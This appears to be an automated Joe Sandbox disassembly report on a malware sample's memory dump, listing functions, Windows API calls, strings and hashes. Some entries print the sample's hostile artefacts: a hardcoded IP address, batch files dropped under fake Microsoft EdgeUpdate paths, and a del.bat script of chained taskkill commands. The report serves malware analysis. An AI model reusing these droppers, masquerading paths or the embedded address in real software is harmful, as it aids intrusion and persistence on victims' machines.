Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: File$FolderPathSpecial$CloseCreateDeleteHandleReadSizeSleep
String ID: .dat
API String ID: 4140139616-100240174
Opcode ID: fd166cb3f739cbd9ff8482634e71b609d17ebca31d8a2562ffcfae29c9f00d16
Instruction ID: bb2c1ec7e099ae5dbfbce5e3b07366015ef333a3ec296eb38e229a96cc13e055
Opcode Fuzzy Hash: fd166cb3f739cbd9ff8482634e71b609d17ebca31d8a2562ffcfae29c9f00d16
Instruction Fuzzy Hash: 751127B1D24285ABEBF4AB70ED44BEAB7ED4B50311F00448DE389562C2D7F897C48B51

Function 06D06228 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 53COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 06D0622D

Part of subcall function 06CFA00C: RaiseException.KERNEL32(06D04592,00000000,?,06D0F828,?,invalid string position,06D04592,00000000,06D117F8,?,invalid string position), ref: 06CFA03A

Strings

ios::failbit set, xrefs: 06D06264
ios::badbit set, xrefs: 06D0625A
ios::eofbit set, xrefs: 06D0626B, 06D0627F, 06D06287

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: ExceptionH_prologRaise
String ID: ios::badbit set$ios::eofbit set$ios::failbit set
API String ID: 3968804221-425934345
Opcode ID: 638038c9a3f5c011832d850044e5b1007109bad160c064885f9bdec1c2d01d14
Instruction ID: 390ed4967c17f7c334a8a92c88a8ce9201ca9eb477bd73bcbf6b25a9a73acbf7
Opcode Fuzzy Hash: 638038c9a3f5c011832d850044e5b1007109bad160c064885f9bdec1c2d01d14
Instruction Fuzzy Hash: C81169B2C01184BEEBE0EFE4D890BEEB7789F15214F148059E95667381D6749509D760

Function 06CFABCC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(06CF6D67,143.92.60.116,06CFABA8,00000000,00000000,00000000,06CF6D67,00000000), ref: 06CFABE1
TerminateProcess.KERNEL32(00000000), ref: 06CFABE8
ExitProcess.KERNEL32 ref: 06CFAC69

Strings

143.92.60.116, xrefs: 06CFABCC

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID: 143.92.60.116
API String ID: 1703294689-3891370194
Opcode ID: 8facd76bf2cdd9594ede5ba629047d23b112757f3f0ad16ba51b39710782623e
Instruction ID: 24ed1f42b169021da9be9e1f030953fa873317c474fff0300bcc83c09cfc8564
Opcode Fuzzy Hash: 8facd76bf2cdd9594ede5ba629047d23b112757f3f0ad16ba51b39710782623e
Instruction Fuzzy Hash: 4201C831524342EFDAE17FAAF845A59FBD6BB50710B10041DF75956240CB72A584DA11

Function 06CF4C6F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat,?,?,06CF5D6A,C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat), ref: 06CF4C85
WriteFile.KERNEL32(00000000,06D15680,00001F53,?,00000000,?,?,06CF5D6A,C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat), ref: 06CF4C9D
CloseHandle.KERNEL32(00000000,?,?,06CF5D6A,C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat), ref: 06CF4CAA

Strings

C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat, xrefs: 06CF4C75

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleWrite
String ID: C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat
API String ID: 1065093856-3013772396
Opcode ID: ac6c302fa297099f73f833ce5bd8772665f778fc9bcda2eba1d777f69a261a55
Instruction ID: 2d1bebc1523a52869994719f97fc0dbe7c22b9d89c5cb5d109c15ed940869e0f
Opcode Fuzzy Hash: ac6c302fa297099f73f833ce5bd8772665f778fc9bcda2eba1d777f69a261a55
Instruction Fuzzy Hash: 4EE04FB128622D7FFB201E71BC8AFE77B5EEB057E8F004521FB0499240C6929D4886F4

Function 06CF29CE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,00000000,76230F00,?,06CF3E44,C:\ProgramData\Microsoft\del.bat,?,?), ref: 06CF29E4
WriteFile.KERNEL32(00000000,@echo off 2>nul 3>nultimeout /t 5taskkill /im notepad.exe /ftaskkill /im microsoft.exe /ftaskkill /im iusb3mon.exe /ftaskkill /im iusb3mon.exe /ftaskkill /im iusb3mon.exe /ftaskkill /im rundll32.exe /ftaskkill /im rundll32.exe /ftaskkill ,00000F7D,?,00000000,?,06CF3E44,C:\ProgramData\Microsoft\del.bat,?,?), ref: 06CF29FC
CloseHandle.KERNEL32(00000000,?,06CF3E44,C:\ProgramData\Microsoft\del.bat,?,?), ref: 06CF2A09

Strings

@echo off 2>nul 3>nultimeout /t 5taskkill /im notepad.exe /ftaskkill /im microsoft.exe /ftaskkill /im iusb3mon.exe /ftaskkill /im iusb3mon.exe /ftaskkill /im iusb3mon.exe /ftaskkill /im rundll32.exe /ftaskkill /im rundll32.exe /ftaskkill , xrefs: 06CF29F6

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleWrite
String ID: @echo off 2>nul 3>nultimeout /t 5taskkill /im notepad.exe /ftaskkill /im microsoft.exe /ftaskkill /im iusb3mon.exe /ftaskkill /im iusb3mon.exe /ftaskkill /im iusb3mon.exe /ftaskkill /im rundll32.exe /ftaskkill /im rundll32.exe /ftaskkill
API String ID: 1065093856-3151026013
Opcode ID: 0cf3afb7d1a57f4a91b9c3e16b7d565f895989cb01abbc7734b92871e43e98e0
Instruction ID: 33e4d7bfe3f518a352768d8afc94db4da858172596b6a7b86dab21ee82ddabc4
Opcode Fuzzy Hash: 0cf3afb7d1a57f4a91b9c3e16b7d565f895989cb01abbc7734b92871e43e98e0
Instruction Fuzzy Hash: FAE048712452297FFA301A71AC89FE77B5DEB057D4F004121F70495240D6515D4486B4

Function 06CF5D5B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30processsleepCOMMON

Download Yara Rule

APIs

Part of subcall function 06CF4C6F: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat,?,?,06CF5D6A,C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat), ref: 06CF4C85
Part of subcall function 06CF4C6F: WriteFile.KERNEL32(00000000,06D15680,00001F53,?,00000000,?,?,06CF5D6A,C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat), ref: 06CF4C9D
Part of subcall function 06CF4C6F: CloseHandle.KERNEL32(00000000,?,?,06CF5D6A,C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat), ref: 06CF4CAA

Part of subcall function 06CF1C74: SetFileAttributesA.KERNEL32(00000000,00000080,06CF682E,C:\ProgramData\Microsoft\Program\ziliao.jpg,00000000), ref: 06CF1C88

WinExec.KERNEL32(C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat,00000000), ref: 06CF5D7E
Sleep.KERNEL32(000493E0), ref: 06CF5D8C
WinExec.KERNEL32(C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat,00000000), ref: 06CF5DA2

Strings

C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat, xrefs: 06CF5D5E, 06CF5D64, 06CF5D6C, 06CF5D7D, 06CF5D8E, 06CF5D96, 06CF5DA1

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: File$Exec$AttributesCloseCreateHandleSleepWrite
String ID: C:\ProgramData\Microsoft\EdgeUpdate\Log\kill.bat
API String ID: 3627572907-3013772396
Opcode ID: 2bf2677378658414e820b515b9551400e6ddaceddb5eb183b77e5c40a22b287f
Instruction ID: caa3896172e17fbef9371e7c1044d427c0b523d81d3de82cacfb10f5f6b75b5d
Opcode Fuzzy Hash: 2bf2677378658414e820b515b9551400e6ddaceddb5eb183b77e5c40a22b287f
Instruction Fuzzy Hash: A6E08C30522A68BAE0E273215C82FDF365D8F93744F050020F7183A3D29BC92B0A81FE

Function 06D0B81C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27stringCOMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(00000000,000000F0), ref: 06D0B82D
GetClassNameA.USER32(00000000,?,0000000A), ref: 06D0B848
lstrcmpiA.KERNEL32(?,combobox), ref: 06D0B857

Strings

combobox, xrefs: 06D0B851

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: ClassLongNameWindowlstrcmpi
String ID: combobox
API String ID: 2054663530-2240613097
Opcode ID: 84ab95d715affae8818ed1deeac01d79d9b0fd07e341ced60abdb6f52ae8b24b
Instruction ID: d3cc06d21c3a3cc26ce6e6115ffa4ffa04735c467c3b804b2be9d2bb1667840b
Opcode Fuzzy Hash: 84ab95d715affae8818ed1deeac01d79d9b0fd07e341ced60abdb6f52ae8b24b
Instruction Fuzzy Hash: 45E06531A58109BFEF509F60CC49B593778AB00745F108921F926D51E0D731D259C652

Function 06CF734F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 25stringnetworkCOMMON

Download Yara Rule

APIs

Part of subcall function 06CF91B3: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,?,00000000,00000000,00006365), ref: 06CF9216
Part of subcall function 06CF91B3: GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 06CF922E
Part of subcall function 06CF91B3: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 06CF923E
Part of subcall function 06CF91B3: GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 06CF924E
Part of subcall function 06CF91B3: GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 06CF925B
Part of subcall function 06CF91B3: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 06CF9268
Part of subcall function 06CF91B3: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,00006365), ref: 06CF93F3

lstrlenA.KERNEL32(?,?,?,?,?,06CF7971,?,00000032,?,?,?,00000004), ref: 06CF7383
gethostname.WS2_32(?,?), ref: 06CF7392

Strings

Console, xrefs: 06CF7370
Remarkbeizhu, xrefs: 06CF736B

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressProc$Library$FreeLoadgethostnamelstrlen
String ID: Console$Remarkbeizhu
API String ID: 4010645601-3228434003
Opcode ID: e3826c5b164972650399c0f6c98168058fcf3894987f6b54ff19009794e8a0be
Instruction ID: d882ccbf9efc2c885fcfcf73ae05ce388f23b3570c805a016704917ebe6aaad7
Opcode Fuzzy Hash: e3826c5b164972650399c0f6c98168058fcf3894987f6b54ff19009794e8a0be
Instruction Fuzzy Hash: 46E08632655311BADAE12B60AC06FCF7B6BAF89710F008408F75475190D7F1919597DB

Function 06CFC069 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KERNEL32,06CF99FE), ref: 06CFC06E
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 06CFC07E

Strings

IsProcessorFeaturePresent, xrefs: 06CFC078
KERNEL32, xrefs: 06CFC069

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: 18c342bbfaefba28f15f21a1e9664daadb5844aed0d864d1c82f014cc1bcbc69
Instruction ID: c4f7e3490716ba203e356c8743f4c0f935ea2d7789bb7f66ffb7102e665714d6
Opcode Fuzzy Hash: 18c342bbfaefba28f15f21a1e9664daadb5844aed0d864d1c82f014cc1bcbc69
Instruction Fuzzy Hash: E7C012A0B943477BFAF82BB22C49F57230C0B00A02F480E18A716E10C0CEE0C1098562

Function 06CFAF85 Relevance: 6.5, APIs: 5, Instructions: 278COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a0e0a62b2b649012a26d97e7f00e828b565af5e7a9561c5f0215adaf6f49dfd
Instruction ID: 853c3fcb8315e37d909cb68cc5b937670edf97f1635336397cf9415576c6f448
Opcode Fuzzy Hash: 2a0e0a62b2b649012a26d97e7f00e828b565af5e7a9561c5f0215adaf6f49dfd
Instruction Fuzzy Hash: 8A91FBB1D20114AFDFE1AB64DD44ADE7B79EF48760F240619FA35B6290D7328E40D760

Function 06CFF990 Relevance: 6.4, APIs: 5, Instructions: 102memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(00000000,00002020,?,?,?,06CF8D56,06CFFE5C,00000000,00000010,00000000,00000009,00000009,?,06CFAD87,00000010,00000000), ref: 06CFF9B1
VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,06CF8D56,06CFFE5C,00000000,00000010,00000000,00000009,00000009,?,06CFAD87,00000010,00000000), ref: 06CFF9D5
VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,06CF8D56,06CFFE5C,00000000,00000010,00000000,00000009,00000009,?,06CFAD87,00000010,00000000), ref: 06CFF9EF
VirtualFree.KERNEL32(00000000,00000000,00008000,?,06CF8D56,06CFFE5C,00000000,00000010,00000000,00000009,00000009,?,06CFAD87,00000010,00000000,06CF8D56), ref: 06CFFAB0
HeapFree.KERNEL32(00000000,00000000,?,06CF8D56,06CFFE5C,00000000,00000010,00000000,00000009,00000009,?,06CFAD87,00000010,00000000,06CF8D56,00000000), ref: 06CFFAC7

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AllocVirtual$FreeHeap
String ID:
API String ID: 714016831-0
Opcode ID: 999ba5649007614721aa141b42480a7f4de25c655d1ff533ac1ce967b85f72f7
Instruction ID: 78884baf1c06989b2bf813e15e3f22c26cf46fc212ab11831b44c6e8ba5de3c6
Opcode Fuzzy Hash: 999ba5649007614721aa141b42480a7f4de25c655d1ff533ac1ce967b85f72f7
Instruction Fuzzy Hash: 3B31E471A54706AFE3B0CF25DC44B21B7E2EB44B50F10852EE3769B390D7B0A545CB55

Function 06D019EA Relevance: 6.2, APIs: 4, Instructions: 170fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 06D01A64
GetLastError.KERNEL32 ref: 06D01A6E
ReadFile.KERNEL32(?,?,00000001,?,00000000), ref: 06D01B34
GetLastError.KERNEL32 ref: 06D01B3E

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: ErrorFileLastRead
String ID:
API String ID: 1948546556-0
Opcode ID: de33e46f32f8e77aaf79c431f58a79f6e69c47a945f8edcd713e157650f021be
Instruction ID: fafcf013e559a51a0e65144be6c7f4706d04424040be9756bc52a2f2727f2041
Opcode Fuzzy Hash: de33e46f32f8e77aaf79c431f58a79f6e69c47a945f8edcd713e157650f021be
Instruction Fuzzy Hash: 18519034A042899FFBA18FE8CC84BA97BF1AF06304F148599E8A58B3D1E774D546CB51

Function 06D01626 Relevance: 6.1, APIs: 4, Instructions: 135fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,00000000,00000000,00000001,00000824,?), ref: 06D016ED

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 25677bf0b94ceabbdde042a430baa86dce05e7428dedf50644cddc12518bf5be
Instruction ID: 330b0077dd67e16da7020d3caf9ab35a1ed66e6e9d16c60b77e597194a7f5a73
Opcode Fuzzy Hash: 25677bf0b94ceabbdde042a430baa86dce05e7428dedf50644cddc12518bf5be
Instruction Fuzzy Hash: 76518E35D00218EFEB92CFA8CC84B9DBBB5FF85340F548595E9659B290D770DA44CBA0

Function 06D06B0E Relevance: 6.1, APIs: 4, Instructions: 119COMMON

Download Yara Rule

APIs

InterlockedIncrement.KERNEL32(06D2893C), ref: 06D06B52
InterlockedDecrement.KERNEL32(06D2893C), ref: 06D06B61
InterlockedDecrement.KERNEL32(06D2893C), ref: 06D06B94
InterlockedDecrement.KERNEL32(06D2893C), ref: 06D06C2C

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Interlocked$Decrement$Increment
String ID:
API String ID: 2574743344-0
Opcode ID: cc7b8cf0ed73a17ac342b333c3c35dbb8d44100e5c28ab378c27c37ce521c932
Instruction ID: a0801af6a08002973dadcc4a5e5a18414fe76fcefc7d6689f186f91fac55009f
Opcode Fuzzy Hash: cc7b8cf0ed73a17ac342b333c3c35dbb8d44100e5c28ab378c27c37ce521c932
Instruction Fuzzy Hash: B1312471914299BFFFE25B60CC48BAA7FA9EB06720F140059F6055A3C1CA74C9E1D791

Function 06D0BF72 Relevance: 6.1, APIs: 4, Instructions: 87windowCOMMON

Download Yara Rule

APIs

Part of subcall function 06D0C0EA: GetParent.USER32(?), ref: 06D0C11D
Part of subcall function 06D0C0EA: GetLastActivePopup.USER32(?), ref: 06D0C12C
Part of subcall function 06D0C0EA: IsWindowEnabled.USER32(?), ref: 06D0C141
Part of subcall function 06D0C0EA: EnableWindow.USER32(?,00000000), ref: 06D0C154

SendMessageA.USER32(?,00000376,00000000,00000000), ref: 06D0BFA8
GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,?,00000000), ref: 06D0C016
MessageBoxA.USER32(00000000,?,?,00000000), ref: 06D0C024
EnableWindow.USER32(00000000,00000001), ref: 06D0C040

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D2A000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_6cf0000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Window$EnableMessage$ActiveEnabledFileLastModuleNameParentPopupSend
String ID:
API String ID: 1958756768-0
Opcode ID: 23ed4f5534d14c207fd6c36749ef0a4e7484f7c9c027582bfa5347e732e8fb59
Instruction ID: 8ce5bba3491dff85cc071d808882bd294fff59d899c723082b3d4372b87f6893
Opcode Fuzzy Hash: 23ed4f5534d14c207fd6c36749ef0a4e7484f7c9c027582bfa5347e732e8fb59
Instruction Fuzzy Hash: 79216D76E04109ABFB608FA6C881BAEBBB9EB04350F14452AE614E32C0C772D944CB60

Function 06D033E5 Relevance: 6.1, APIs: 4, Instructions: 67COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(06CFEA70,00000001,00000000,?,?,?,?,?,?,06CFEA70,?,0000000C), ref: 06D03414
MultiByteToWideChar.KERNEL32(06CFEA70,00000009,0000000C,?,00000000,00000000,?,?,?,06CFEA70,?,0000000C), ref: 06D03427
MultiByteToWideChar.KERNEL32(06CFEA70,00000001,0000000C,?,?,00000000,?,?,?,06CFEA70,?,0000000C), ref: 06D03473
CompareStringW.KERNEL32(?,?,?,?,?,00000000,?,00000000,?,?,?,06CFEA70,?,0000000C), ref: 06D0348B

Memory Dump Source

Source File: 00000021.00000002.4653240535.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: true

Associated: 00000021.00000002.4653240535.0000000006D21000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D23000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D26000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000021.00000002.4653240535.0000000006D28000.00000040.00001000.00020000.00000000.sdmpDownload File
